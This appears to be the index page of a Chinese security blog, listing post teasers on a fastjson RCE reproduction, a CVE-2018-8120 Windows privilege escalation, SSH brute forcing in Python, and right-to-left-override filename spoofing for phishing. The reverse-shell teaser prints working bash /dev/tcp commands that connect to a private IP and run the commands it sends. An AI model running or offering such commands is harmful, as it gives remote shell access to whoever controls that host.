fastjson<1.2.47 RCE 漏洞复现

这两天爆出了 fastjson 的老洞,复现简单记录一下。 首先使用 spark 搭建一个简易的利用 fastjson 解析 json 的 http server。 ...

July 15, 2019 · 1 分钟

反弹shell以及端口转发的方法收集

Bash 1 bash -i >& /dev/tcp/192.168.1.142/80 0>&1 1 2 3 4 exec 5<>/dev/tcp/192.168.1.142/80 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done ...

August 23, 2018 · 1 分钟

CVE-2018-8120 Windows权限提升

来源 : bigric3/cve-2018-8120 Detail : cve-2018-8120-analysis-and-exploit ...

May 18, 2018 · 1 分钟

Python SSH爆破以及Python3线程池控制线程数

源自一个朋友的要求,他的要求是只爆破一个ip,结果出来后就停止,如果是爆破多个,完全没必要停止,等他跑完就好 ...

January 13, 2018 · 1 分钟

从右向左覆盖实现恶意软件扩展名欺骗

这个技术虽然老掉牙,但在网络钓鱼中非常好用 ...

October 24, 2017 · 1 分钟